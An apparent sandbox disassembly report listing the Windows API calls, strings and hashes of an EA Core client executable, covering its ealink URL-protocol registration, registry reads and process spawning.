                                                                                                                                                      • String ID: AgentAdd$AgentRemove$AgentTaskAdd$AgentTaskRemove$AgentTaskStatusGet$AgentTaskStatusSet$Command$Connect$Connect3$Disconnect$IsConnected$ItemClearCache$ItemDecryptCancel$ItemDecryptStart$ItemDownloadCancel$ItemDownloadStart$ItemDownloadTogglePauseState$ItemEnumPatches$ItemGetStatus$ItemInstallStart$ItemInstallStartBatch$ItemUnpackCancel$ItemUnpackStart$ItemUse$StateGet$StateSetProperty$StateSetTag$Unable to locate required %s$UserEnumContent$UserGetEntitlements$UserGetNames$UserIsLoggedIn$UserLogin$UserLogout$ViewSetContentFilters
                                                                                                                                                      • API String ID: 1029625771-469933569
                                                                                                                                                      • Opcode ID: 188e2270707432a5962ec1fd5cf00e03fe9ea02481facc80de23009df005a4e4
                                                                                                                                                      • Instruction ID: 9fa1f707f8fb64ba1f71a20fb7b6fa33dd77cac9be6680ed116804a284e664ba
                                                                                                                                                      • Opcode Fuzzy Hash: 188e2270707432a5962ec1fd5cf00e03fe9ea02481facc80de23009df005a4e4
                                                                                                                                                      • Instruction Fuzzy Hash: CB71E170B212209BDB14BB75AA04A9A32D9EF45314F82943FE143B73D1DBBD9C148B9C
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00404010: __wcsicoll.LIBCMT ref: 004040D6
                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(EACORECLI_SPAWNED,00000010,00000200,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403918
                                                                                                                                                      • _wcsnlen.LIBCMT ref: 00403936
                                                                                                                                                        • Part of subcall function 00406810: LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A03
                                                                                                                                                      • lstrcpyW.KERNEL32(?,00000000,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A22
                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A29
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A3E
                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A45
                                                                                                                                                      • lstrcpyW.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00403A8E
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403A95
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403A98
                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403AA8
                                                                                                                                                      • GetStartupInfoW.KERNEL32 ref: 00403AEE
                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00403AF4
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Environment$Stringslstrcpy$CommandFreeInfoLibraryLineLoadStartupVariable__wcsicoll_wcsnlen
                                                                                                                                                      • String ID: %s environment variable found, entering blocking mode$%s=1$-wait option is set, entering blocking mode$D$EACORECLI_SPAWNED$Failed to launch handler process. %s$Handler process successfully spawned$wait
                                                                                                                                                      • API String ID: 2447714805-1081694395
                                                                                                                                                      • Opcode ID: 7a124c851049d3f06802cae96bf49cbf3fc812b641ea475440534917832cb425
                                                                                                                                                      • Instruction ID: 6d00ab7843f541fbbc14f52a0966576ff50e96e8f61d5f7a95a8d4ff5e0bb530
                                                                                                                                                      • Opcode Fuzzy Hash: 7a124c851049d3f06802cae96bf49cbf3fc812b641ea475440534917832cb425
                                                                                                                                                      • Instruction Fuzzy Hash: 64D1D1712083409FD315DF28C845B5BBBE4BFC9318F048A2EF589A72D1D778A945CB9A
                                                                                                                                                      APIs
                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(80000000,ealink,00000000,00000000,00000000,000F003F,00000000,?,?,?,00000004), ref: 00403D98
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,00000004), ref: 00403E11
                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,URL:ealink protocol,00000028,?,?,?,?,00000004), ref: 00403E5E
                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,URL Protocol,00000000,00000001,00429530,00000002,?,?,00000004), ref: 00403E7B
                                                                                                                                                      • RegCreateKeyW.ADVAPI32(?,DefaultIcon,?), ref: 00403E90
                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000002,?,?,?,?,?,00000004), ref: 00403ED8
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000004), ref: 00403EE1
                                                                                                                                                      • RegCreateKeyW.ADVAPI32(?,shell,?), ref: 00403EF6
                                                                                                                                                      • RegCreateKeyW.ADVAPI32(?,open,00000004), ref: 00403F17
                                                                                                                                                      • RegCreateKeyW.ADVAPI32(00000004,command,?), ref: 00403F34
                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000002,?,?,?,?,00000004), ref: 00403F74
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000004), ref: 00403F7D
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000004,?,?,00000004), ref: 00403F86
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000004), ref: 00403F8F
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000004), ref: 00403F98
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreate$Value$FileModuleName
                                                                                                                                                      • String ID: "%s" "%%1" -wait$"%s",-%u$DefaultIcon$URL Protocol$URL:$URL:ealink protocol$command$ealink$open$shell
                                                                                                                                                      • API String ID: 562726067-3366672052
                                                                                                                                                      • Opcode ID: 29258b752a715726cb2019f92678dc0124f5f0abd6b8a6cad12d52febe84ad78
                                                                                                                                                      • Instruction ID: 2d17851c17755659bb6fed31c70a1752706c36ece24bc0cbc964e87f1143786b
                                                                                                                                                      • Opcode Fuzzy Hash: 29258b752a715726cb2019f92678dc0124f5f0abd6b8a6cad12d52febe84ad78
                                                                                                                                                      • Instruction Fuzzy Hash: 8E91E271B00215AFD724CF68DC89FAAB3B8FF88710F108299E505A72D0D774AE45CB94
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004157AE), ref: 00416992
                                                                                                                                                      • __mtterm.LIBCMT ref: 0041699E
                                                                                                                                                        • Part of subcall function 004166D7: DecodePointer.KERNEL32(FFFFFFFF,00416B00,?,004157AE), ref: 004166E8
                                                                                                                                                        • Part of subcall function 004166D7: TlsFree.KERNEL32(FFFFFFFF,00416B00,?,004157AE), ref: 00416702
                                                                                                                                                        • Part of subcall function 004166D7: DeleteCriticalSection.KERNEL32(00000000,00000000,76EE5810,?,00416B00,?,004157AE), ref: 0041B487
                                                                                                                                                        • Part of subcall function 004166D7: _free.LIBCMT ref: 0041B48A
                                                                                                                                                        • Part of subcall function 004166D7: DeleteCriticalSection.KERNEL32(FFFFFFFF,76EE5810,?,00416B00,?,004157AE), ref: 0041B4B1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004169B4
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004169C1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004169CE
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004169DB
                                                                                                                                                      • TlsAlloc.KERNEL32(?,004157AE), ref: 00416A2B
                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,004157AE), ref: 00416A46
                                                                                                                                                      • __init_pointers.LIBCMT ref: 00416A50
                                                                                                                                                      • EncodePointer.KERNEL32(?,004157AE), ref: 00416A61
                                                                                                                                                      • EncodePointer.KERNEL32(?,004157AE), ref: 00416A6E
                                                                                                                                                      • EncodePointer.KERNEL32(?,004157AE), ref: 00416A7B
                                                                                                                                                      • EncodePointer.KERNEL32(?,004157AE), ref: 00416A88
                                                                                                                                                      • DecodePointer.KERNEL32(0041685B,?,004157AE), ref: 00416AA9
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00416ABE
                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,004157AE), ref: 00416AD8
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00416AEA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                                      • Opcode ID: b28ab0302830108e0582c0ac885daa21842f7bb8de2b3c263851f268a6a83a45
                                                                                                                                                      • Instruction ID: 914d0277f797a2f4816733ac280e4db07d06b593b3d291f74573943c4e1e268e
                                                                                                                                                      • Opcode Fuzzy Hash: b28ab0302830108e0582c0ac885daa21842f7bb8de2b3c263851f268a6a83a45
                                                                                                                                                      • Instruction Fuzzy Hash: C031737190C2209AD720AF75BC06B6A3EA5AF45360715967BE800D33B0DBBAD841CF5C
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 00416888
                                                                                                                                                        • Part of subcall function 0041444C: HeapFree.KERNEL32(00000000,00000000,?,00416832,00000000,?,?,00414408,004136EF), ref: 00414462
                                                                                                                                                        • Part of subcall function 0041444C: GetLastError.KERNEL32(00000000,?,00416832,00000000,?,?,00414408,004136EF), ref: 00414474
                                                                                                                                                      • _free.LIBCMT ref: 00416896
                                                                                                                                                      • _free.LIBCMT ref: 004168A4
                                                                                                                                                      • _free.LIBCMT ref: 004168B2
                                                                                                                                                      • _free.LIBCMT ref: 004168C0
                                                                                                                                                      • _free.LIBCMT ref: 004168CE
                                                                                                                                                      • _free.LIBCMT ref: 004168DF
                                                                                                                                                      • __lock.LIBCMT ref: 004168E7
                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004168F9
                                                                                                                                                      • _free.LIBCMT ref: 0041690C
                                                                                                                                                      • __lock.LIBCMT ref: 00416920
                                                                                                                                                      • ___removelocaleref.LIBCMT ref: 00416935
                                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 00416951
                                                                                                                                                      • _free.LIBCMT ref: 00416964
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$__lock$DecrementErrorFreeHeapInterlockedLast___freetlocinfo___removelocaleref
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 829874470-0
                                                                                                                                                      • Opcode ID: 3b1cb0cbd6c1d9e81b3a1f771ab6ccc93afb538172364e193a824c50ba1e1e20
                                                                                                                                                      • Instruction ID: 8c3e26e593937771846b6c374c4ed5737222b072e88b7e4844ed73f8815af00e
                                                                                                                                                      • Opcode Fuzzy Hash: 3b1cb0cbd6c1d9e81b3a1f771ab6ccc93afb538172364e193a824c50ba1e1e20
                                                                                                                                                      • Instruction Fuzzy Hash: 072160B22052005BDA247BBAA4457AF63E86F84728B2A851FF40497291DF3CE9C0852D
                                                                                                                                                      APIs
                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041F47B
                                                                                                                                                        • Part of subcall function 00413492: __getptd.LIBCMT ref: 004134A5
                                                                                                                                                        • Part of subcall function 00414403: __getptd_noexit.LIBCMT ref: 00414403
                                                                                                                                                      • __shift.LIBCMT ref: 0041F4E9
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 0041F53D
                                                                                                                                                      • _memmove.LIBCMT ref: 0041F5A1
                                                                                                                                                      • __invoke_watson.LIBCMT ref: 0041F5C4
                                                                                                                                                      • __fltout2.LIBCMT ref: 0041F5F9
                                                                                                                                                        • Part of subcall function 00420C33: ___dtold.LIBCMT ref: 00420C59
                                                                                                                                                        • Part of subcall function 00420C33: _$I10_OUTPUT.LIBCMT ref: 00420C74
                                                                                                                                                        • Part of subcall function 00420C33: _strcpy_s.LIBCMT ref: 00420C94
                                                                                                                                                      • __fptostr.LIBCMT ref: 0041F657
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Locale_strcpy_s$I10_UpdateUpdate::____dtold__fltout2__fptostr__getptd__getptd_noexit__invoke_watson__shift_memmove
                                                                                                                                                      • String ID: -$e+000
                                                                                                                                                      • API String ID: 2872883240-1412363215
                                                                                                                                                      • Opcode ID: 80bbff2313622aef98a3b749ba6f0eed36fbf8023f7dfeddaf6998f980f6238c
                                                                                                                                                      • Instruction ID: c60df709e1acc720f731806fd25f3312cafaa5f327fe4214f5e428acaeea59b3
                                                                                                                                                      • Opcode Fuzzy Hash: 80bbff2313622aef98a3b749ba6f0eed36fbf8023f7dfeddaf6998f980f6238c
                                                                                                                                                      • Instruction Fuzzy Hash: 1B711472600345AFCB15DF78CC81AEB7BA5AF44314F18857FE4129B282D338D986C755
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00412E30: RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Electronic Arts\EA Core,C6FB9493), ref: 00412E93
                                                                                                                                                        • Part of subcall function 00412E30: RegQueryValueExW.ADVAPI32(C6FB9493,00000000,00000000,?,00000000,00000000,?,00000000,C6FB9493,00000000), ref: 00412EB9
                                                                                                                                                        • Part of subcall function 00412E30: RegQueryValueExW.ADVAPI32(C6FB9493,00000000,00000000,?,00000000,00000000,80070057,?,00000000,C6FB9493,00000000), ref: 00412F19
                                                                                                                                                      • __wcsicoll.LIBCMT ref: 004040D6
                                                                                                                                                      • PathFileExistsW.SHLWAPI(?), ref: 0040416E
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 004041A8
                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004041C8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$CreateException@8ExistsFileInfoOpenPathProcessStartupThrow__wcsicoll
                                                                                                                                                      • String ID: ClientPath$ClientVersion$D$TASK_LAUNCH_VAULT$taskId
                                                                                                                                                      • API String ID: 250433368-3794618676
                                                                                                                                                      • Opcode ID: 08c08dd2a7f5c98b7fc6987f10198b84985c4a5a63c51848e293be478a0b1cbe
                                                                                                                                                      • Instruction ID: 76b1966acc7033ab64905c1a3fd4d20a6124fa36ab320636d25b5177588580d5
                                                                                                                                                      • Opcode Fuzzy Hash: 08c08dd2a7f5c98b7fc6987f10198b84985c4a5a63c51848e293be478a0b1cbe
                                                                                                                                                      • Instruction Fuzzy Hash: 2A71C270A00604DFDB00DFA8C885B9EB7B4FF99324F148269E525AB3E1D7399A45CB94
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004060D2
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004060E7
                                                                                                                                                        • Part of subcall function 00401850: _memmove_s.LIBCMT ref: 004018C7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_malloc_memmove_sstd::exception::exception
                                                                                                                                                      • String ID: %I64d$%lu$CommandIndex$PrevCommand$xsB
                                                                                                                                                      • API String ID: 1860171432-3474438254
                                                                                                                                                      • Opcode ID: 96eaf29f573fc05d54491307b7f3db57108491e08cc3f2a4a95e96654d7aa1aa
                                                                                                                                                      • Instruction ID: c5004cb68efb67194c6f87c48ca3711ded65f2a9143ef5647ee9976fbfe6ad8a
                                                                                                                                                      • Opcode Fuzzy Hash: 96eaf29f573fc05d54491307b7f3db57108491e08cc3f2a4a95e96654d7aa1aa
                                                                                                                                                      • Instruction Fuzzy Hash: A3D19171A00605DFDB04DF9DC880AAEB7B5FF88314F24826AE515AB391D738AE05CB95
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wcsicoll
                                                                                                                                                      • String ID: Console added to log output$Could not add file %s to log$File %s added to log$console$false$file
                                                                                                                                                      • API String ID: 3832890014-2584448219
                                                                                                                                                      • Opcode ID: 1a08a012ac65999c8174157735e916b28457271b0fadf02bb8d59d74e1470fdb
                                                                                                                                                      • Instruction ID: a8fcaa21e284d30e8fecf8c9f0b476e71f75c2b91a7b52cfa491ca81cfd6bdde
                                                                                                                                                      • Opcode Fuzzy Hash: 1a08a012ac65999c8174157735e916b28457271b0fadf02bb8d59d74e1470fdb
                                                                                                                                                      • Instruction Fuzzy Hash: BC81B971600605DFDB04DB68C841B9EB7B5FF85324F14836EE525AB3E1D734A905CBA4
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Electronic Arts\EA Core,C6FB9493), ref: 00412E93
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(C6FB9493,00000000,00000000,?,00000000,00000000,?,00000000,C6FB9493,00000000), ref: 00412EB9
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(C6FB9493,00000000,00000000,?,00000000,00000000,80070057,?,00000000,C6FB9493,00000000), ref: 00412F19
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      • _wcsnlen.LIBCMT ref: 00412F30
                                                                                                                                                      • RegCloseKey.ADVAPI32(C6FB9493,?,00000000,C6FB9493,00000000), ref: 00412F52
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Electronic Arts\EA Core, xrefs: 00412E7B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$CloseException@8OpenThrow_wcsnlen
                                                                                                                                                      • String ID: SOFTWARE\Electronic Arts\EA Core
                                                                                                                                                      • API String ID: 922926716-227494909
                                                                                                                                                      • Opcode ID: 75133fe29f0d75d512c43b9e2b8e0231faae1fa167434d0b11c600b6562343be
                                                                                                                                                      • Instruction ID: 7a639c6b66232bf2a509c11970b60c131960bb7f6978763a11664d3db71cf0c1
                                                                                                                                                      • Opcode Fuzzy Hash: 75133fe29f0d75d512c43b9e2b8e0231faae1fa167434d0b11c600b6562343be
                                                                                                                                                      • Instruction Fuzzy Hash: 134179B1A00209AFDB10DF99DD84AAEF7F9FF88314F20496EE505E7250D778A9418B94
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00401DE6
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00401DFB
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00401E0A
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00401E1F
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                        • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                      • String ID: xsB$xsB
                                                                                                                                                      • API String ID: 2621100827-68959868
                                                                                                                                                      • Opcode ID: 8215094215c13d6a3dcd50be55ae5cf5bf2f7228950e984a2d85efd7248c176d
                                                                                                                                                      • Instruction ID: 778eb612fba3b6ce96523c047d895c47cfc0f6d1dfa00d93fd7411120063d9d5
                                                                                                                                                      • Opcode Fuzzy Hash: 8215094215c13d6a3dcd50be55ae5cf5bf2f7228950e984a2d85efd7248c176d
                                                                                                                                                      • Instruction Fuzzy Hash: DE4159B5A406048FC710CF69D880A9AFBF0FF98314B54C66FE85997741E738EA04CBA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00404E99
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404EAE
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00404EBD
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404ED2
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                        • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                      • String ID: xsB$xsB
                                                                                                                                                      • API String ID: 2621100827-68959868
                                                                                                                                                      • Opcode ID: eff2206f4909ef7f00548ec5c40d9041846c228344b7a7bf0811809fc827db25
                                                                                                                                                      • Instruction ID: 63f6167787b5849e1bf8a21454d71ba3d6dd6c242267a25200910bc6f432d0b2
                                                                                                                                                      • Opcode Fuzzy Hash: eff2206f4909ef7f00548ec5c40d9041846c228344b7a7bf0811809fc827db25
                                                                                                                                                      • Instruction Fuzzy Hash: 52316BB1A00204CFCB10DFA8D881B9AB7F4FF88314F148A6EE555A7781D738A904CBA4
                                                                                                                                                      APIs
                                                                                                                                                      • _malloc.LIBCMT ref: 0041C5C1
                                                                                                                                                        • Part of subcall function 00415170: __FF_MSGBANNER.LIBCMT ref: 00415189
                                                                                                                                                        • Part of subcall function 00415170: __NMSG_WRITE.LIBCMT ref: 00415190
                                                                                                                                                        • Part of subcall function 00415170: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00416F22,?,00000001,?,?,0041B525,00000018,0042D5F0,0000000C,0041B5B5), ref: 004151B5
                                                                                                                                                      • _free.LIBCMT ref: 0041C5D4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocHeap_free_malloc
                                                                                                                                                      • String ID: AcB
                                                                                                                                                      • API String ID: 2734353464-1478174269
                                                                                                                                                      • Opcode ID: 8b6c01779e3b714c63fddf65fb88cc6ff26c2e2c4537bd79e95977f20cc853d5
                                                                                                                                                      • Instruction ID: 3fbff88a0494120e4650b485aa6fdb2f7ac20307385e551b3c582f91f470e137
                                                                                                                                                      • Opcode Fuzzy Hash: 8b6c01779e3b714c63fddf65fb88cc6ff26c2e2c4537bd79e95977f20cc853d5
                                                                                                                                                      • Instruction Fuzzy Hash: 4F11E732984214ABCB212B75BC457DB3B959F843A4F20152BF80597251DF7C89D19A9C
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D4B8,00000008,0041681C,00000000,00000000,?,?,00414408,004136EF), ref: 00416725
                                                                                                                                                      • __lock.LIBCMT ref: 00416759
                                                                                                                                                        • Part of subcall function 0041B59A: __mtinitlocknum.LIBCMT ref: 0041B5B0
                                                                                                                                                        • Part of subcall function 0041B59A: __amsg_exit.LIBCMT ref: 0041B5BC
                                                                                                                                                        • Part of subcall function 0041B59A: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041675E,0000000D), ref: 0041B5C4
                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00416766
                                                                                                                                                      • __lock.LIBCMT ref: 0041677A
                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00416798
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                      • Opcode ID: cf9044d909a80a9cd1ff4a26ba37dc503059a3b1c36592aa200a094437635a16
                                                                                                                                                      • Instruction ID: 2a005e2a26b7ca0d99b70be6941c5cde8c8a031a6340c38cdbef76149252a918
                                                                                                                                                      • Opcode Fuzzy Hash: cf9044d909a80a9cd1ff4a26ba37dc503059a3b1c36592aa200a094437635a16
                                                                                                                                                      • Instruction Fuzzy Hash: BE016571544704DFD720AF66D846789BBE0BF50318F10854FE8A5563D1CBB8A680CB19
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?cmd=,-000000F0,00000000,00424AC8,000000FF,?,0040530B,00000001,00000000,00000000,?,0000000D,?,00000001), ref: 004055A3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                      • String ID: '%s' is not a recognized command$'%s' is not a recognized command Id$'%s' is not a valid command line$?cmd=$Failed to set parameters for command %s. %s
                                                                                                                                                      • API String ID: 1659193697-3601394813
                                                                                                                                                      • Opcode ID: a6b82354fa24fe632ef5d29c7df6978a5f1a493634a230fd05eafbcfe10ffe30
                                                                                                                                                      • Instruction ID: 798868e04bc199de5828f86eb8defdc8c90eec0ebd6dcdaa2e18cfd21095d804
                                                                                                                                                      • Opcode Fuzzy Hash: a6b82354fa24fe632ef5d29c7df6978a5f1a493634a230fd05eafbcfe10ffe30
                                                                                                                                                      • Instruction Fuzzy Hash: 3C81F371A006059FCB10DFA8C885A9FB7B1EF44324F24466EE855A73D1DB38AD01CFA8
                                                                                                                                                      APIs
                                                                                                                                                      • AllocConsole.KERNEL32(00000000,?,?,?,?,?,?,?,004118D1,00404392,?,?,?,00000004,00000001,00403CC0), ref: 004113E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocConsole
